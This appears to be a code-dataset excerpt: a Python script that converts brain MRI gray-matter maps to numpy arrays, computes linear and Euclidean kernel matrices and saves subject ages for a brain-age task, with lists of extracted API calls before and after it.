[((342, 417), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""PyTorch Digital Mammography Training"""'}), "(description='PyTorch Digital Mammography Training')\n", (365, 417), False, 'import argparse\n'), ((3535, 3633), 'torch.utils.data.DataLoader', 'DataLoader', (['train_set'], {'batch_size': 'args.batch_size', 'shuffle': '(True)', 'num_workers': 'args.num_workers'}), '(train_set, batch_size=args.batch_size, shuffle=True, num_workers\n =args.num_workers)\n', (3545, 3633), False, 'from torch.utils.data import DataLoader, Dataset\n'), ((3710, 3807), 'torch.utils.data.DataLoader', 'DataLoader', (['val_set'], {'batch_size': 'args.batch_size', 'shuffle': '(False)', 'num_workers': 'args.num_workers'}), '(val_set, batch_size=args.batch_size, shuffle=False, num_workers=\n args.num_workers)\n', (3720, 3807), False, 'from torch.utils.data import DataLoader, Dataset\n'), ((3350, 3379), 'os.path.join', 'os.path.join', (['val_fol', '"""*png"""'], {}), "(val_fol, '*png')\n", (3362, 3379), False, 'import time, os, sys\n'), ((4834, 4871), 'sklearn.metrics.accuracy_score', 'accuracy_score', (['labels_val', 'preds_val'], {}), '(labels_val, preds_val)\n', (4848, 4871), False, 'from sklearn.metrics import mean_squared_error, accuracy_score, hamming_loss, roc_curve, auc, f1_score, confusion_matrix\n'), ((4881, 4929), 'sklearn.metrics.f1_score', 'f1_score', (['labels_val', 'preds_val'], {'average': '"""macro"""'}), "(labels_val, preds_val, average='macro')\n", (4889, 4929), False, 'from sklearn.metrics import mean_squared_error, accuracy_score, hamming_loss, roc_curve, auc, f1_score, confusion_matrix\n'), ((5280, 5291), 'time.time', 'time.time', ([], {}), '()\n', (5289, 5291), False, 'import time, os, sys\n'), ((10207, 10235), 'sys.setrecursionlimit', 'sys.setrecursionlimit', (['(10000)'], {}), '(10000)\n', (10228, 10235), False, 'import time, os, sys\n'), ((1607, 1633), 'os.path.basename', 'os.path.basename', (['__file__'], {}), '(__file__)\n', (1623, 1633), False, 'import time, os, sys\n'), ((3237, 3273), 'os.path.join', 'os.path.join', (['train_seer_fol', '"""*png"""'], {}), "(train_seer_fol, '*png')\n", (3249, 3273), False, 'import time, os, sys\n'), ((3287, 3327), 'os.path.join', 'os.path.join', (['train_beatrice_fol', '"""*png"""'], {}), "(train_beatrice_fol, '*png')\n", (3299, 3327), False, 'import time, os, sys\n'), ((5345, 5356), 'time.time', 'time.time', ([], {}), '()\n', (5354, 5356), False, 'import time, os, sys\n'), ((9989, 10000), 'time.time', 'time.time', ([], {}), '()\n', (9998, 10000), False, 'import time, os, sys\n'), ((1693, 1719), 'os.path.basename', 'os.path.basename', (['__file__'], {}), '(__file__)\n', (1709, 1719), False, 'import time, os, sys\n'), ((2447, 2473), 'torchvision.transforms.RandomCrop', 'transforms.RandomCrop', (['APS'], {}), '(APS)\n', (2468, 2473), False, 'from torchvision import transforms\n'), ((2538, 2566), 'torchvision.transforms.Scale', 'transforms.Scale', (['input_size'], {}), '(input_size)\n', (2554, 2566), False, 'from torchvision import transforms\n'), ((2576, 2609), 'torchvision.transforms.RandomHorizontalFlip', 'transforms.RandomHorizontalFlip', ([], {}), '()\n', (2607, 2609), False, 'from torchvision import transforms\n'), ((2619, 2650), 'torchvision.transforms.RandomVerticalFlip', 'transforms.RandomVerticalFlip', ([], {}), '()\n', (2648, 2650), False, 'from torchvision import transforms\n'), ((2660, 2737), 'torchvision.transforms.ColorJitter', 'transforms.ColorJitter', ([], {'brightness': '(0.3)', 'contrast': '(0.3)', 'saturation': '(0.3)', 'hue': '(0.1)'}), '(brightness=0.3, contrast=0.3, saturation=0.3, hue=0.1)\n', (2682, 2737), False, 'from torchvision import transforms\n'), ((2747, 2768), 'torchvision.transforms.ToTensor', 'transforms.ToTensor', ([], {}), '()\n', (2766, 2768), False, 'from torchvision import transforms\n'), ((2778, 2809), 'torchvision.transforms.Normalize', 'transforms.Normalize', (['mean', 'std'], {}), '(mean, std)\n', (2798, 2809), False, 'from torchvision import transforms\n'), ((2854, 2882), 'torchvision.transforms.Scale', 'transforms.Scale', (['input_size'], {}), '(input_size)\n', (2870, 2882), False, 'from torchvision import transforms\n'), ((2892, 2913), 'torchvision.transforms.ToTensor', 'transforms.ToTensor', ([], {}), '()\n', (2911, 2913), False, 'from torchvision import transforms\n'), ((2923, 2954), 'torchvision.transforms.Normalize', 'transforms.Normalize', (['mean', 'std'], {}), '(mean, std)\n', (2943, 2954), False, 'from torchvision import transforms\n'), ((8060, 8078), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (8076, 8078), False, 'import time, os, sys\n'), ((8267, 8278), 'time.time', 'time.time', ([], {}), '()\n', (8276, 8278), False, 'import time, os, sys\n'), ((8884, 8895), 'time.time', 'time.time', ([], {}), '()\n', (8893, 8895), False, 'import time, os, sys\n'), ((8691, 8730), 'sklearn.metrics.confusion_matrix', 'confusion_matrix', (['Tr', 'Pr'], {'labels': '[0, 1]'}), '(Tr, Pr, labels=[0, 1])\n', (8707, 8730), False, 'from sklearn.metrics import mean_squared_error, accuracy_score, hamming_loss, roc_curve, auc, f1_score, confusion_matrix\n'), ((9133, 9153), 'copy.deepcopy', 'copy.deepcopy', (['model'], {}), '(model)\n', (9146, 9153), False, 'import copy\n'), ((9441, 9468), 'os.path.isdir', 'os.path.isdir', (['"""checkpoint"""'], {}), "('checkpoint')\n", (9454, 9468), False, 'import time, os, sys\n'), ((9494, 9516), 'os.mkdir', 'os.mkdir', (['"""checkpoint"""'], {}), "('checkpoint')\n", (9502, 9516), False, 'import time, os, sys\n'), ((9593, 9618), 'os.path.isdir', 'os.path.isdir', (['save_point'], {}), '(save_point)\n', (9606, 9618), False, 'import time, os, sys\n'), ((9644, 9664), 'os.mkdir', 'os.mkdir', (['save_point'], {}), '(save_point)\n', (9652, 9664), False, 'import time, os, sys\n'), ((9731, 9752), 'time.strftime', 'strftime', (['"""%m%d_%H%M"""'], {}), "('%m%d_%H%M')\n", (9739, 9752), False, 'from time import strftime\n'), ((7786, 7797), 'time.time', 'time.time', ([], {}), '()\n', (7795, 7797), False, 'import time, os, sys\n'), ((8607, 8618), 'time.time', 'time.time', ([], {}), '()\n', (8616, 8618), False, 'import time, os, sys\n')]
|
"""File with the preprocessing tools."""
import os
import numpy as np
import nibabel as nib
import pandas as pd
from tqdm import tqdm
from sklearn.metrics import pairwise_distances
from sklearn.metrics.pairwise import linear_kernel
# Change this path
path = '' # folder containing the gray-matter maps
# Folders with the resulting data
output_data = 'Data/'
output_kernels = 'Kernels/'
output_target = 'Target/'
# List of all the NifTI files
nifti_images = [file for file in os.listdir(path) if file.endswith('.nii.gz')]
# Convert each NifTI into a numpy.ndarray
for file in nifti_images:
img = nib.load(os.path.join(path, file))
img_data = img.get_fdata()
np.save(os.path.join(output_data, file.split('_')[0]), img_data)
# Get the subject IDs
subjects = []
listdir = os.listdir(output_data)
listdir = [x for x in listdir if not x.startswith('.')]
n_samples = len(listdir)
# Compute the kernels using batches to reduce the memory usage
batches = np.array_split(np.arange(len(listdir)), 20)
lin_kernel = np.empty((n_samples, n_samples))
euclidean_norm = np.empty((n_samples, n_samples))
for batch_i in tqdm(batches):
data_i = []
for i in batch_i:
data_i.append(np.load(output_data + listdir[i]).ravel())
subjects.append(listdir[i].split('.')[0])
data_i = np.asarray(data_i)
for batch_j in batches:
data_j = []
for j in batch_j:
data_j.append(np.load(output_data + listdir[j]).ravel())
data_j = np.asarray(data_j)
# Compute the kernels
euclidean_norm[batch_i[0]:batch_i[-1] + 1,
batch_j[0]:batch_j[-1] + 1] = (
pairwise_distances(data_i, data_j, metric='euclidean') ** 2
)
lin_kernel[batch_i[0]:batch_i[-1] + 1, batch_j[0]:batch_j[-1] + 1] = (
linear_kernel(data_i, data_j)
)
# Save the kernels in CSV files
linear_kernel_df = pd.DataFrame(lin_kernel, index=subjects, columns=subjects)
linear_kernel_df.to_csv(output_kernels + 'linear_kernel.csv')
euclidean_norm_df = pd.DataFrame(euclidean_norm, index=subjects,
columns=subjects)
euclidean_norm_df.to_csv(output_kernels + 'euclidean_norm.csv')
# Save the target variable in a CSV file
# Change this path
df_y = pd.read_csv("/Volumes/dtlake01.aramis/users/clinica/pac2019/dataset/"
"PAC2019_BrainAge_Training.csv")
y = []
for subject in subjects:
y.append(df_y[df_y['subject_ID'] == subject]['age'].item())
df_y_new = pd.Series(y, index=subjects)
df_y_new.to_csv(output_target + 'age.csv')
|
[
"pandas.DataFrame",
"tqdm.tqdm",
"numpy.load",
"sklearn.metrics.pairwise.linear_kernel",
"pandas.read_csv",
"numpy.empty",
"numpy.asarray",
"sklearn.metrics.pairwise_distances",
"pandas.Series",
"os.path.join",
"os.listdir"
] |
[((789, 812), 'os.listdir', 'os.listdir', (['output_data'], {}), '(output_data)\n', (799, 812), False, 'import os\n'), ((1026, 1058), 'numpy.empty', 'np.empty', (['(n_samples, n_samples)'], {}), '((n_samples, n_samples))\n', (1034, 1058), True, 'import numpy as np\n'), ((1076, 1108), 'numpy.empty', 'np.empty', (['(n_samples, n_samples)'], {}), '((n_samples, n_samples))\n', (1084, 1108), True, 'import numpy as np\n'), ((1125, 1138), 'tqdm.tqdm', 'tqdm', (['batches'], {}), '(batches)\n', (1129, 1138), False, 'from tqdm import tqdm\n'), ((1908, 1966), 'pandas.DataFrame', 'pd.DataFrame', (['lin_kernel'], {'index': 'subjects', 'columns': 'subjects'}), '(lin_kernel, index=subjects, columns=subjects)\n', (1920, 1966), True, 'import pandas as pd\n'), ((2050, 2112), 'pandas.DataFrame', 'pd.DataFrame', (['euclidean_norm'], {'index': 'subjects', 'columns': 'subjects'}), '(euclidean_norm, index=subjects, columns=subjects)\n', (2062, 2112), True, 'import pandas as pd\n'), ((2278, 2387), 'pandas.read_csv', 'pd.read_csv', (['"""/Volumes/dtlake01.aramis/users/clinica/pac2019/dataset/PAC2019_BrainAge_Training.csv"""'], {}), "(\n '/Volumes/dtlake01.aramis/users/clinica/pac2019/dataset/PAC2019_BrainAge_Training.csv'\n )\n", (2289, 2387), True, 'import pandas as pd\n'), ((2509, 2537), 'pandas.Series', 'pd.Series', (['y'], {'index': 'subjects'}), '(y, index=subjects)\n', (2518, 2537), True, 'import pandas as pd\n'), ((1306, 1324), 'numpy.asarray', 'np.asarray', (['data_i'], {}), '(data_i)\n', (1316, 1324), True, 'import numpy as np\n'), ((482, 498), 'os.listdir', 'os.listdir', (['path'], {}), '(path)\n', (492, 498), False, 'import os\n'), ((616, 640), 'os.path.join', 'os.path.join', (['path', 'file'], {}), '(path, file)\n', (628, 640), False, 'import os\n'), ((1486, 1504), 'numpy.asarray', 'np.asarray', (['data_j'], {}), '(data_j)\n', (1496, 1504), True, 'import numpy as np\n'), ((1816, 1845), 'sklearn.metrics.pairwise.linear_kernel', 'linear_kernel', (['data_i', 'data_j'], {}), '(data_i, data_j)\n', (1829, 1845), False, 'from sklearn.metrics.pairwise import linear_kernel\n'), ((1654, 1708), 'sklearn.metrics.pairwise_distances', 'pairwise_distances', (['data_i', 'data_j'], {'metric': '"""euclidean"""'}), "(data_i, data_j, metric='euclidean')\n", (1672, 1708), False, 'from sklearn.metrics import pairwise_distances\n'), ((1200, 1233), 'numpy.load', 'np.load', (['(output_data + listdir[i])'], {}), '(output_data + listdir[i])\n', (1207, 1233), True, 'import numpy as np\n'), ((1426, 1459), 'numpy.load', 'np.load', (['(output_data + listdir[j])'], {}), '(output_data + listdir[j])\n', (1433, 1459), True, 'import numpy as np\n')]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.